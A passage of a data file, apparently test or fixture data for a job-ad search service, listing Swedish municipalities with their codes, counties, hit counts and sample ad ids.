{'id': 'fFeF_RCz_Tm5', 'name': 'Nordanstig', 'type': 'municipality', 'code': '2132', 'region_code': '21',
'region_name': 'Gävleborgs län', 'hits': 0, 'ad_ids': []},
{'id': '63iQ_V6F_REB', 'name': 'Ljusdal', 'type': 'municipality', 'code': '2161', 'region_code': '21',
'region_name': 'Gävleborgs län', 'hits': 3, 'ad_ids': ['24624560', '24621604', '24604812']},
{'id': 'qk8Y_2b6_82D', 'name': 'Gävle', 'type': 'municipality', 'code': '2180', 'region_code': '21',
'region_name': 'Gävleborgs län', 'hits': 61,
'ad_ids': ['24648286', '24647457', '24645453', '24643119', '24641947', '24641752', '24641744', '24639606',
'24639443', '24638181']},
{'id': 'BbdN_xLB_k6s', 'name': 'Sandviken', 'type': 'municipality', 'code': '2181', 'region_code': '21',
'region_name': 'Gävleborgs län', 'hits': 11,
'ad_ids': ['24640410', '24639185', '24630586', '24610267', '24602729', '24587145', '24586302', '24578542',
'24576851', '24558652']},
{'id': 'JauG_nz5_7mu', 'name': 'Söderhamn', 'type': 'municipality', 'code': '2182', 'region_code': '21',
'region_name': 'Gävleborgs län', 'hits': 6,
'ad_ids': ['24640054', '24616079', '24614547', '24595502', '24503253', '24488845']},
{'id': 'KxjG_ig5_exF', 'name': 'Bollnäs', 'type': 'municipality', 'code': '2183', 'region_code': '21',
'region_name': 'Gävleborgs län', 'hits': 12,
'ad_ids': ['24647491', '24623857', '24623859', '24632941', '24631240', '24613810', '24612003', '24590238',
'24590045', '24548369']},
{'id': 'Utks_mwF_axY', 'name': 'Hudiksvall', 'type': 'municipality', 'code': '2184', 'region_code': '21',
'region_name': 'Gävleborgs län', 'hits': 26,
'ad_ids': ['24650607', '24650499', '24649045', '24648589', '24641095', '24641643', '24641698', '24647095',
'24646916', '24645190']},
{'id': 'swVa_cyS_EMN', 'name': 'Ånge', 'type': 'municipality', 'code': '2260', 'region_code': '22',
'region_name': 'Västernorrlands län', 'hits': 4, 'ad_ids': ['24639288', '24628389', '24610700', '24460553']},
{'id': 'oJ8D_rq6_kjt', 'name': 'Timrå', 'type': 'municipality', 'code': '2262', 'region_code': '22',
'region_name': 'Västernorrlands län', 'hits': 5,
'ad_ids': ['24649312', '24628388', '24620973', '24579351', '24504810']},
{'id': 'uYRx_AdM_r4A', 'name': 'Härnösand', 'type': 'municipality', 'code': '2280', 'region_code': '22',
'region_name': 'Västernorrlands län', 'hits': 14,
'ad_ids': ['24649670', '24634810', '24626434', '24626359', '24610521', '24604584', '24599753', '24595015',
'24588000', '24568790']},
{'id': 'dJbx_FWY_tK6', 'name': 'Sundsvall', 'type': 'municipality', 'code': '2281', 'region_code': '22',
'region_name': 'Västernorrlands län', 'hits': 58,
'ad_ids': ['24650752', '24650176', '24650130', '24650080', '24649995', '24649952', '24648358', '24646387',
'24645570', '24645032']},
{'id': 'yR8g_7Jz_HBZ', 'name': 'Kramfors', 'type': 'municipality', 'code': '2282', 'region_code': '22',
'region_name': 'Västernorrlands län', 'hits': 8,
'ad_ids': ['24649705', '24633992', '24633462', '24627834', '24587306', '24582328', '24574236', '24550420']},
{'id': 'v5y4_YPe_TMZ', 'name': 'Sollefteå', 'type': 'municipality', 'code': '2283', 'region_code': '22',
'region_name': 'Västernorrlands län', 'hits': 9,
'ad_ids': ['24649400', '24649380', '24642982', '24642980', '24634683', '24605190', '24588189', '24540108',
'24455320']},
{'id': 'zBmE_n6s_MnQ', 'name': 'Örnsköldsvik', 'type': 'municipality', 'code': '2284', 'region_code': '22',
'region_name': 'Västernorrlands län', 'hits': 23,
'ad_ids': ['24650185', '24649663', '24648830', '24648370', '24646067', '24643411', '24641851', '24634399',
'24632450', '24624920']},
{'id': 'Voto_egJ_FZP', 'name': 'Ragunda', 'type': 'municipality', 'code': '2303', 'region_code': '23',
'region_name': 'Jämtlands län', 'hits': 0, 'ad_ids': []},
{'id': 'eNSc_Nj1_CDP', 'name': 'Bräcke', 'type': 'municipality', 'code': '2305', 'region_code': '23',
'region_name': 'Jämtlands län', 'hits': 1, 'ad_ids': ['24615354']},
{'id': 'yurW_aLE_4ga', 'name': 'Krokom', 'type': 'municipality', 'code': '2309', 'region_code': '23',
'region_name': 'Jämtlands län', 'hits': 0, 'ad_ids': []},
{'id': 'ppjq_Eci_Wz9', 'name': 'Strömsund', 'type': 'municipality', 'code': '2313', 'region_code': '23',
'region_name': 'Jämtlands län', 'hits': 6,
'ad_ids': ['24646613', '24635521', '24634425', '24611237', '24608422', '24566029']},
{'id': 'D7ax_CXP_6r1', 'name': 'Åre', 'type': 'municipality', 'code': '2321', 'region_code': '23',
'region_name': 'Jämtlands län', 'hits': 2, 'ad_ids': ['24587180', '24572426']},
{'id': 'gRNJ_hVW_Gpg', 'name': 'Berg', 'type': 'municipality', 'code': '2326', 'region_code': '23',
'region_name': 'Jämtlands län', 'hits': 1, 'ad_ids': ['24626189']},
{'id': 'j35Q_VKL_NiM', 'name': 'Härjedalen', 'type': 'municipality', 'code': '2361', 'region_code': '23',
'region_name': 'Jämtlands län', 'hits': 8,
'ad_ids': ['24650648', '24649337', '24648475', '24626268', '24615961', '24600435', '24565037', '24560583']},
{'id': 'Vt7P_856_WZS', 'name': 'Östersund', 'type': 'municipality', 'code': '2380', 'region_code': '23',
'region_name': 'Jämtlands län', 'hits': 36,
'ad_ids': ['24650954', '24650862', '24648805', '24647118', '24640165', '24637613', '24634928', '24634409',
'24633737', '24631136']},
{'id': 'wMab_4Zs_wpM', 'name': 'Nordmaling', 'type': 'municipality', 'code': '2401', 'region_code': '24',
'region_name': 'Västerbottens län', 'hits': 2, 'ad_ids': ['24588012', '24494081']},
{'id': 'vQkf_tw2_CmR', 'name': 'Bjurholm', 'type': 'municipality', 'code': '2403', 'region_code': '24',
'region_name': 'Västerbottens län', 'hits': 0, 'ad_ids': []},
{'id': 'izT6_zWu_tta', 'name': 'Vindeln', 'type': 'municipality', 'code': '2404', 'region_code': '24',
'region_name': 'Västerbottens län', 'hits': 4, 'ad_ids': ['24610047', '24595064', '24585738', '24581311']},
{'id': 'p8Mv_377_bxp', 'name': 'Robertsfors', 'type': 'municipality', 'code': '2409', 'region_code': '24',
'region_name': 'Västerbottens län', 'hits': 1, 'ad_ids': ['24643631']},
{'id': 'XmpG_vPQ_K7T', 'name': 'Norsjö', 'type': 'municipality', 'code': '2417', 'region_code': '24',
'region_name': 'Västerbottens län', 'hits': 1, 'ad_ids': ['24577456']},
{'id': '7sHJ_YCE_5Zv', 'name': 'Malå', 'type': 'municipality', 'code': '2418', 'region_code': '24',
'region_name': 'Västerbottens län', 'hits': 1, 'ad_ids': ['24641503']},
{'id': 'gQgT_BAk_fMu', 'name': 'Storuman', 'type': 'municipality', 'code': '2421', 'region_code': '24',
'region_name': 'Västerbottens län', 'hits': 3, 'ad_ids': ['24648927', '24612310', '24551322']},
{'id': 'VM7L_yJK_Doo', 'name': 'Sorsele', 'type': 'municipality', 'code': '2422', 'region_code': '24',
'region_name': 'Västerbottens län', 'hits': 1, 'ad_ids': ['24644670']},
{'id': 'tSkf_Tbn_rHk', 'name': 'Dorotea', 'type': 'municipality', 'code': '2425', 'region_code': '24',
'region_name': 'Västerbottens län', 'hits': 2, 'ad_ids': ['24648188', '24551059']},
{'id': 'utQc_6xq_Dfm', 'name': 'Vännäs', 'type': 'municipality', 'code': '2460', 'region_code': '24',
'region_name': 'Västerbottens län', 'hits': 1, 'ad_ids': ['24477260']},
{'id': 'tUnW_mFo_Hvi', 'name': 'Vilhelmina', 'type': 'municipality', 'code': '2462', 'region_code': '24',
'region_name': 'Västerbottens län', 'hits': 3, 'ad_ids': ['24650955', '24646598', '24389476']},
{'id': 'xLdL_tMA_JJv', 'name': 'Åsele', 'type': 'municipality', 'code': '2463', 'region_code': '24',
'region_name': 'Västerbottens län', 'hits': 2, 'ad_ids': ['24635862', '24596209']},
{'id': 'QiGt_BLu_amP', 'name': 'Umeå', 'type': 'municipality', 'code': '2480', 'region_code': '24',
'region_name': 'Västerbottens län', 'hits': 61,
'ad_ids': ['24651085', '24650971', '24649245', '24649034', '24648882', '24647955', '24647299', '24646501',
'24643021', '24642426']},
{'id': '7rpN_naz_3Uz', 'name': 'Lycksele', 'type': 'municipality', 'code': '2481', 'region_code': '24',
'region_name': 'Västerbottens län', 'hits': 5,
'ad_ids': ['24650360', '24636787', '24624131', '24584326', '24461658']},
{'id': 'kicB_LgH_2Dk', 'name': 'Skellefteå', 'type': 'municipality', 'code': '2482', 'region_code': '24',
'region_name': 'Västerbottens län', 'hits': 26,
'ad_ids': ['24650579', '24650245', '24647140', '24646439', '24644842', '24644817', '24641617', '24639673',
'24633366', '24629478']},
{'id': 'A5WX_XVo_Zt6', 'name': 'Arvidsjaur', 'type': 'municipality', 'code': '2505', 'region_code': '25',
'region_name': 'Norrbottens län', 'hits': 0, 'ad_ids': []},
{'id': 'vkQW_GB6_MNk', 'name': 'Arjeplog', 'type': 'municipality', 'code': '2506', 'region_code': '25',
'region_name': 'Norrbottens län', 'hits': 4, 'ad_ids': ['24650467', '24594796', '24505073', '24488974']},
{'id': 'mp6j_2b6_1bz', 'name': 'Jokkmokk', 'type': 'municipality', 'code': '2510', 'region_code': '25',
'region_name': 'Norrbottens län', 'hits': 2, 'ad_ids': ['24636604', '24629767']},
{'id': 'n5Sq_xxo_QWL', 'name': 'Överkalix', 'type': 'municipality', 'code': '2513', 'region_code': '25',
'region_name': 'Norrbottens län', 'hits': 2, 'ad_ids': ['24626297', '24562294']},
{'id': 'cUyN_C9V_HLU', 'name': 'Kalix', 'type': 'municipality', 'code': '2514', 'region_code': '25',
'region_name': 'Norrbottens län', 'hits': 7,
'ad_ids': ['24650117', '24647684', '24617672', '24610596', '24598334', '24578326', '24549825']},
{'id': 'ehMP_onv_Chk', 'name': 'Övertorneå', 'type': 'municipality', 'code': '2518', 'region_code': '25',
'region_name': 'Norrbottens län', 'hits': 2, 'ad_ids': ['24615259', '24602364']},
{'id': 'dHMF_72G_4NM', 'name': 'Pajala', 'type': 'municipality', 'code': '2521', 'region_code': '25',
'region_name': 'Norrbottens län', 'hits': 5,
'ad_ids': ['24613530', '24579678', '24421022', '24421085', '24421026']},
{'id': '6R2u_zkb_uoS', 'name': 'Gällivare', 'type': 'municipality', 'code': '2523', 'region_code': '25',
'region_name': 'Norrbottens län', 'hits': 12,
'ad_ids': ['24650616', '24647793', '24646122', '24646015', '24645490', '24639665', '24631189', '24626915',
'24620850', '24613056']},
{'id': '14WF_zh1_W3y', 'name': 'Älvsbyn', 'type': 'municipality', 'code': '2560', 'region_code': '25',
'region_name': 'Norrbottens län', 'hits': 1, 'ad_ids': ['24648879']},
{'id': 'CXbY_gui_14v', 'name': 'Luleå', 'type': 'municipality', 'code': '2580', 'region_code': '25',
'region_name': 'Norrbottens län', 'hits': 54,
'ad_ids': ['24650277', '24649382', '24646536', '24646256', '24645408', '24645272', '24644929', '24642846',
'24640988', '24637961']},
{'id': 'umej_bP2_PpK', 'name': 'Piteå', 'type': 'municipality', 'code': '2581', 'region_code': '25',
'region_name': 'Norrbottens län', 'hits': 21,
'ad_ids': ['24647791', '24646569', '24646410', '24642289', '24640981', '24629378', '24627010', '24615196',
'24614741', '24613745']},
{'id': 'y4NQ_tnB_eVd', 'name': 'Boden', 'type': 'municipality', 'code': '2582', 'region_code': '25',
'region_name': 'Norrbottens län', 'hits': 6,
'ad_ids': ['24641061', '24625531', '24621825', '24593711', '24591832', '24547017']},
{'id': 'tfRE_hXa_eq7', 'name': 'Haparanda', 'type': 'municipality', 'code': '2583', 'region_code': '25',
'region_name': 'Norrbottens län', 'hits': 3, 'ad_ids': ['24649761', '24641448', '24585171']},
{'id': 'biN6_UiL_Qob', 'name': 'Kiruna', 'type': 'municipality', 'code': '2584', 'region_code': '25',
'region_name': 'Norrbottens län', 'hits': 18,
'ad_ids': ['24649230', '24637663', '24620869', '24616612', '24609586', '24609582', '24607586', '24605447',
'24604398', '24594403']},
{'id': 'y9HE_XD7_WaD', 'name': 'Aneby', 'type': 'municipality', 'code': '0604', 'region_code': '06',
'region_name': 'Jönköpings län', 'hits': 2, 'ad_ids': ['24623297', '24579234']},
{'id': '91VR_Hxi_GN4', 'name': 'Gnosjö', 'type': 'municipality', 'code': '0617', 'region_code': '06',
'region_name': 'Jönköpings län', 'hits': 5,
'ad_ids': ['24628681', '24604131', '24590061', '24566659', '24558133']},
{'id': 'smXg_BXp_jTW', 'name': 'Mullsjö', 'type': 'municipality', 'code': '0642', 'region_code': '06',
'region_name': 'Jönköpings län', 'hits': 5,
'ad_ids': ['24643973', '24607032', '24606628', '24577681', '24537205']},
{'id': '9zQB_3vU_BQA', 'name': 'Habo', 'type': 'municipality', 'code': '0643', 'region_code': '06',
'region_name': 'Jönköpings län', 'hits': 1, 'ad_ids': ['24579245']},
{'id': 'cNQx_Yqi_83Q', 'name': 'Gislaved', 'type': 'municipality', 'code': '0662', 'region_code': '06',
'region_name': 'Jönköpings län', 'hits': 9,
'ad_ids': ['24613432', '24626013', '24612979', '24609415', '24604594', '24601733', '24599387', '24593831',
'24586269']},
{'id': 'zFup_umX_LVv', 'name': 'Vaggeryd', 'type': 'municipality', 'code': '0665', 'region_code': '06',
'region_name': 'Jönköpings län', 'hits': 5,
'ad_ids': ['24647651', '24633078', '24629708', '24550532', '24583814']},
{'id': 'KURg_KJF_Lwc', 'name': 'Jönköping', 'type': 'municipality', 'code': '0680', 'region_code': '06',
'region_name': 'Jönköpings län', 'hits': 85,
'ad_ids': ['24651032', '24650982', '24650248', '24648832', '24647954', '24647864', '24644298', '24647107',
'24644341', '24644259']},
{'id': 'KfXT_ySA_do2', 'name': 'Nässjö', 'type': 'municipality', 'code': '0682', 'region_code': '06',
'region_name': 'Jönköpings län', 'hits': 10,
'ad_ids': ['24644891', '24639953', '24633087', '24629181', '24621427', '24613566', '24610827', '24589332',
'24575224', '24528277']},
{'id': '6bS8_fzf_xpW', 'name': 'Värnamo', 'type': 'municipality', 'code': '0683', 'region_code': '06',
'region_name': 'Jönköpings län', 'hits': 26,
'ad_ids': ['24641062', '24634862', '24632296', '24631196', '24627728', '24623817', '24622843', '24620357',
'24620014', '24614169']},
{'id': 'L1cX_MjM_y8W', 'name': 'Sävsjö', 'type': 'municipality', 'code': '0684', 'region_code': '06',
'region_name': 'Jönköpings län', 'hits': 7,
'ad_ids': ['24640990', '24631381', '24612486', '24597187', '24581570', '24534133', '24468408']},
{'id': 'xJqx_SLC_415', 'name': 'Vetlanda', 'type': 'municipality', 'code': '0685', 'region_code': '06',
'region_name': 'Jönköpings län', 'hits': 16,
'ad_ids': ['24643277', '24641529', '24640373', '24637057', '24628455', '24627538', '24627537', '24621685',
'24613356', '24609736']},
{'id': 'VacK_WF6_XVg', 'name': 'Eksjö', 'type': 'municipality', 'code': '0686', 'region_code': '06',
'region_name': 'Jönköpings län', 'hits': 14,
'ad_ids': ['24637053', '24632911', '24615733', '24617245', '24609055', '24599160', '24597461', '24594324',
'24586118', '24585765']},
{'id': 'Namm_SpC_RPG', 'name': 'Tranås', 'type': 'municipality', 'code': '0687', 'region_code': '06',
'region_name': 'Jönköpings län', 'hits': 10,
'ad_ids': ['24642284', '24641464', '24626417', '24623265', '24619248', '24618419', '24590114', '24499769',
'24476521', '24433907']},
{'id': '78cu_S5T_Pgp', 'name': 'Uppvidinge', 'type': 'municipality', 'code': '0760', 'region_code': '07',
'region_name': 'Kronobergs län', 'hits': 3, 'ad_ids': ['24639253', '24617976', '24414696']},
{'id': 'nXZy_1Jd_D8X', 'name': 'Lessebo', 'type': 'municipality', 'code': '0761', 'region_code': '07',
'region_name': 'Kronobergs län', 'hits': 1, 'ad_ids': ['24538499']},
{'id': 'qz8Q_kDz_N2Y', 'name': 'Tingsryd', 'type': 'municipality', 'code': '0763', 'region_code': '07',
'region_name': 'Kronobergs län', 'hits': 4, 'ad_ids': ['24641348', '24624969', '24511207', '24491412']},
{'id': 'MMph_wmN_esc', 'name': 'Alvesta', 'type': 'municipality', 'code': '0764', 'region_code': '07',
'region_name': 'Kronobergs län', 'hits': 5,
'ad_ids': ['24650556', '24621112', '24617389', '24576031', '24476169']},
{'id': 'EK6X_wZq_CQ8', 'name': 'Älmhult', 'type': 'municipality', 'code': '0765', 'region_code': '07',
'region_name': 'Kronobergs län', 'hits': 11,
'ad_ids': ['24649769', '24649654', '24641236', '24641229', '24638136', '24632509', '24631497', '24625110',
'24617479', '24614602']},
{'id': 'ZhVf_yL5_Q5g', 'name': 'Markaryd', 'type': 'municipality', 'code': '0767', 'region_code': '07',
'region_name': 'Kronobergs län', 'hits': 10,
'ad_ids': ['24629043', '24643980', '24643878', '24639757', '24637755', '24627553', '24618793', '24583008',
'24553167', '24470454']},
{'id': 'mmot_H3A_auW', 'name': 'Växjö', 'type': 'municipality', 'code': '0780', 'region_code': '07',
'region_name': 'Kronobergs län', 'hits': 68,
'ad_ids': ['24649803', '24649739', '24649728', '24647829', '24647003', '24644326', '24644173', '24643867',
'24643342', '24641504']},
{'id': 'GzKo_S48_QCm', 'name': 'Ljungby', 'type': 'municipality', 'code': '0781', 'region_code': '07',
'region_name': 'Kronobergs län', 'hits': 11,
'ad_ids': ['24648839', '24648771', '24645854', '24643124', '24637014', '24636725', '24635767', '24633273',
'24624230', '24622854']},
{'id': 'WPDh_pMr_RLZ', 'name': 'Högsby', 'type': 'municipality', 'code': '0821', 'region_code': '08',
'region_name': 'Kalmar län', 'hits': 2, 'ad_ids': ['24640369', '24636070']},
{'id': 'wYFb_q7w_Nnh', 'name': 'Torsås', 'type': 'municipality', 'code': '0834', 'region_code': '08',
'region_name': 'Kalmar län', 'hits': 4, 'ad_ids': ['24620345', '24621317', '24604125', '24566576']},
{'id': 'Muim_EAi_EFp', 'name': 'Mörbylånga', 'type': 'municipality', 'code': '0840', 'region_code': '08',
'region_name': 'Kalmar län', 'hits': 9,
'ad_ids': ['24638175', '24629762', '24627653', '24611449', '24607639', '24594093', '24572030', '24546217',
'24488349']},
{'id': 'AEQD_1RT_vM9', 'name': 'Hultsfred', 'type': 'municipality', 'code': '0860', 'region_code': '08',
'region_name': 'Kalmar län', 'hits': 9,
'ad_ids': ['24648249', '24644661', '24636959', '24627269', '24627176', '24620579', '24588831', '24527019',
'24510303']},
{'id': '8eEp_iz4_cNN', 'name': 'Mönsterås', 'type': 'municipality', 'code': '0861', 'region_code': '08',
'region_name': 'Kalmar län', 'hits': 5, 'ad_ids': ['24648226', '24625464', '24618320', '24583746', '24573755']},
{'id': '1koj_6Bg_8K6', 'name': 'Emmaboda', 'type': 'municipality', 'code': '0862', 'region_code': '08',
'region_name': 'Kalmar län', 'hits': 2, 'ad_ids': ['24635771', '24615839']},
{'id': 'Pnmg_SgP_uHQ', 'name': 'Kalmar', 'type': 'municipality', 'code': '0880', 'region_code': '08',
'region_name': 'Kalmar län', 'hits': 52,
'ad_ids': ['24649776', '24649356', '24648115', '24647817', '24647756', '24643992', '24643651', '24641992',
'24641371', '24613487']},
{'id': 'xk68_bJa_6Fh', 'name': 'Nybro', 'type': 'municipality', 'code': '0881', 'region_code': '08',
'region_name': 'Kalmar län', 'hits': 6,
'ad_ids': ['24649149', '24638088', '24631517', '24625340', '24621795', '24612228']},
{'id': 'tUP8_hRE_NcF', 'name': 'Oskarshamn', 'type': 'municipality', 'code': '0882', 'region_code': '08',
'region_name': 'Kalmar län', 'hits': 14,
'ad_ids': ['24648664', '24648628', '24646920', '24645350', '24640633', '24635629', '24630203', '24628734',
'24624215', '24617181']},
{'id': 't7H4_S2P_3Fw', 'name': 'Västervik', 'type': 'municipality', 'code': '0883', 'region_code': '08',
'region_name': 'Kalmar län', 'hits': 18,
'ad_ids': ['24647144', '24641319', '24634992', '24632176', '24628636', '24618501', '24617706', '24614479',
'24608624', '24603700']},
{'id': 'a7hJ_zwv_2FR', 'name': 'Vimmerby', 'type': 'municipality', 'code': '0884', 'region_code': '08',
'region_name': 'Kalmar län', 'hits': 15,
'ad_ids': ['24642646', '24642469', '24634998', '24632703', '24628660', '24619779', '24619775', '24614093',
'24593900', '24590275']},
{'id': 'LY9i_qNL_kXf', 'name': 'Borgholm', 'type': 'municipality', 'code': '0885', 'region_code': '08',
'region_name': 'Kalmar län', 'hits': 4, 'ad_ids': ['24631885', '24600006', '24575680', '24496816']},
{'id': 'Ft9P_E8F_VLJ', 'name': 'Gotland', 'type': 'municipality', 'code': '0980', 'region_code': '09',
'region_name': 'Gotlands län', 'hits': 32,
'ad_ids': ['24649062', '24646081', '24645577', '24643883', '24641060', '24637605', '24637052', '24636730',
'24631180', '24631256']},
{'id': '3XMe_nGt_RcU', 'name': 'Hylte', 'type': 'municipality', 'code': '1315', 'region_code': '13',
'region_name': 'Hallands län', 'hits': 7,
'ad_ids': ['24647998', '24646997', '24645469', '24640710', '24633518', '24629087', '24575788']},
{'id': 'kUQB_KdK_kAh', 'name': 'Halmstad', 'type': 'municipality', 'code': '1380', 'region_code': '13',
'region_name': 'Hallands län', 'hits': 48,
'ad_ids': ['24650491', '24649086', '24648647', '24647496', '24646397', '24646379', '24645317', '24644390',
'24643943', '24643937']},
{'id': 'c1iL_rqh_Zja', 'name': 'Laholm', 'type': 'municipality', 'code': '1381', 'region_code': '13',
'region_name': 'Hallands län', 'hits': 7,
'ad_ids': ['24637743', '24624670', '24624583', '24615475', '24614113', '24588536', '24552904']},
{'id': 'qaJg_wMR_C8T', 'name': 'Falkenberg', 'type': 'municipality', 'code': '1382', 'region_code': '13',
'region_name': 'Hallands län', 'hits': 26,
'ad_ids': ['24650289', '24646671', '24644450', '24644424', '24638795', '24638078', '24635865', '24635663',
'24630122', '24612894']},
{'id': 'AkUx_yAq_kGr', 'name': 'Varberg', 'type': 'municipality', 'code': '1383', 'region_code': '13',
'region_name': 'Hallands län', 'hits': 34,
'ad_ids': ['24650646', '24648999', '24648048', '24647269', '24647256', '24646756', '24646453', '24646370',
'24646335', '24646315']},
{'id': '3JKV_KSK_x6z', 'name': 'Kungsbacka', 'type': 'municipality', 'code': '1384', 'region_code': '13',
'region_name': 'Hallands län', 'hits': 16,
'ad_ids': ['24650147', '24650006', '24640093', '24638112', '24635197', '24632626', '24630508', '24624655',
'24622514', '24607841']},
{'id': 'dzWW_R3G_6Eh', 'name': 'Härryda', 'type': 'municipality', 'code': '1401', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 7,
'ad_ids': ['24631009', '24621857', '24606754', '24587980', '24587111', '24568233', '24531121']},
{'id': 'CCiR_sXa_BVW', 'name': 'Partille', 'type': 'municipality', 'code': '1402', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 9,
'ad_ids': ['24644886', '24643254', '24642579', '24642082', '24623735', '24612128', '24611787', '24502309',
'24468685']},
{'id': 'Zjiv_rhk_oJK', 'name': 'Öckerö', 'type': 'municipality', 'code': '1407', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 2, 'ad_ids': ['24616589', '24601739']},
{'id': 'wHrG_FBH_hoD', 'name': 'Stenungsund', 'type': 'municipality', 'code': '1415', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 5,
'ad_ids': ['24635632', '24628237', '24612130', '24606880', '24587131']},
{'id': 'TbL3_HmF_gnx', 'name': 'Tjörn', 'type': 'municipality', 'code': '1419', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 2, 'ad_ids': ['24594903', '24590040']},
{'id': 'tmAp_ykH_N6k', 'name': 'Orust', 'type': 'municipality', 'code': '1421', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 5,
'ad_ids': ['24642072', '24596275', '24586295', '24541260', '24519447']},
{'id': 'aKkp_sEX_cVM', 'name': 'Sotenäs', 'type': 'municipality', 'code': '1427', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 6,
'ad_ids': ['24612938', '24564119', '24535667', '24520889', '24500709', '24485653']},
{'id': '96Dh_3sQ_RFb', 'name': 'Munkedal', 'type': 'municipality', 'code': '1430', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 3, 'ad_ids': ['24641856', '24624344', '24595408']},
{'id': 'qffn_qY4_DLk', 'name': 'Tanum', 'type': 'municipality', 'code': '1435', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 8,
'ad_ids': ['24627761', '24623563', '24623580', '24621916', '24610846', '24608306', '24607156', '24600587']},
{'id': 'NMc9_oEm_yxy', 'name': 'Dals-Ed', 'type': 'municipality', 'code': '1438', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 0, 'ad_ids': []},
{'id': 'kCHb_icw_W5E', 'name': 'Färgelanda', 'type': 'municipality', 'code': '1439', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 2, 'ad_ids': ['24639807', '24556773']},
{'id': '17Ug_Btv_mBr', 'name': 'Ale', 'type': 'municipality', 'code': '1440', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 3, 'ad_ids': ['24636146', '24628807', '24616322']},
{'id': 'yHV7_2Y6_zQx', 'name': 'Lerum', 'type': 'municipality', 'code': '1441', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 4, 'ad_ids': ['24650394', '24620026', '24603503', '24588967']},
{'id': 'NfFx_5jj_ogg', 'name': 'Vårgårda', 'type': 'municipality', 'code': '1442', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 5,
'ad_ids': ['24648984', '24648901', '24613448', '24595489', '24497926']},
{'id': 'ypAQ_vTD_KLU', 'name': 'Bollebygd', 'type': 'municipality', 'code': '1443', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 1, 'ad_ids': ['24576508']},
{'id': 'ZNZy_Hh5_gSW', 'name': 'Grästorp', 'type': 'municipality', 'code': '1444', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 0, 'ad_ids': []},
{'id': 'ZzEA_2Fg_Pt2', 'name': 'Essunga', 'type': 'municipality', 'code': '1445', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 2, 'ad_ids': ['24626743', '24523562']},
{'id': 'e413_94L_hdh', 'name': 'Karlsborg', 'type': 'municipality', 'code': '1446', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 0, 'ad_ids': []},
{'id': 'roiB_uVV_4Cj', 'name': 'Gullspång', 'type': 'municipality', 'code': '1447', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 1, 'ad_ids': ['24643272']},
{'id': 'SEje_LdC_9qN', 'name': 'Tranemo', 'type': 'municipality', 'code': '1452', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 6,
'ad_ids': ['24645375', '24615877', '24608246', '24595425', '24595398', '24589648']},
{'id': 'hejM_Jct_XJk', 'name': 'Bengtsfors', 'type': 'municipality', 'code': '1460', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 5,
'ad_ids': ['24628976', '24627769', '24606787', '24606679', '24606575']},
{'id': 'tt1B_7rH_vhG', 'name': 'Mellerud', 'type': 'municipality', 'code': '1461', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 4, 'ad_ids': ['24644889', '24638627', '24615086', '24614249']},
{'id': 'YQcE_SNB_Tv3', 'name': '<NAME>', 'type': 'municipality', 'code': '1462', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 4, 'ad_ids': ['24642553', '24632874', '24622421', '24610751']},
{'id': '7HAb_9or_eFM', 'name': 'Mark', 'type': 'municipality', 'code': '1463', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 14,
'ad_ids': ['24648862', '24646848', '24646268', '24641228', '24630473', '24636557', '24636719', '24634116',
'24622756', '24605393']},
{'id': 'rZWC_pXf_ySZ', 'name': 'Svenljunga', 'type': 'municipality', 'code': '1465', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 6,
'ad_ids': ['24643128', '24623466', '24623505', '24615913', '24601846', '24557637']},
{'id': 'J116_VFs_cg6', 'name': 'Herrljunga', 'type': 'municipality', 'code': '1466', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 6,
'ad_ids': ['24641573', '24636142', '24617273', '24602256', '24589027', '24344092']},
{'id': 'fbHM_yhA_BqS', 'name': 'Vara', 'type': 'municipality', 'code': '1470', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 9,
'ad_ids': ['24629592', '24623071', '24600787', '24581780', '24573835', '24573476', '24564712', '24560074',
'24550766']},
{'id': 'txzq_PQY_FGi', 'name': 'Götene', 'type': 'municipality', 'code': '1471', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 4, 'ad_ids': ['24640957', '24645273', '24482625', '24435186']},
{'id': 'aLFZ_NHw_atB', 'name': 'Tibro', 'type': 'municipality', 'code': '1472', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 8,
'ad_ids': ['24645712', '24644627', '24629456', '24602786', '24606277', '24573354', '24571196', '24529612']},
{'id': 'a15F_gAH_pn6', 'name': 'Töreboda', 'type': 'municipality', 'code': '1473', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 4, 'ad_ids': ['24627789', '24606276', '24602447', '24522711']},
{'id': 'PVZL_BQT_XtL', 'name': 'Göteborg', 'type': 'municipality', 'code': '1480', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 366,
'ad_ids': ['24681247', '24676773', '24650996', '24650965', '24650945', '24650584', '24650192', '24649925',
'24649915', '24649703']},
{'id': 'mc45_ki9_Bv3', 'name': 'Mölndal', 'type': 'municipality', 'code': '1481', 'region_code': '14',
'region_name': 'Västra Götalands län', 'hits': 34,
'ad_ids': ['24650280', '24647664', '24645598', '24645052', '24644887', '24642987', '24642642', '24641578',
'24635304', '24632723']},
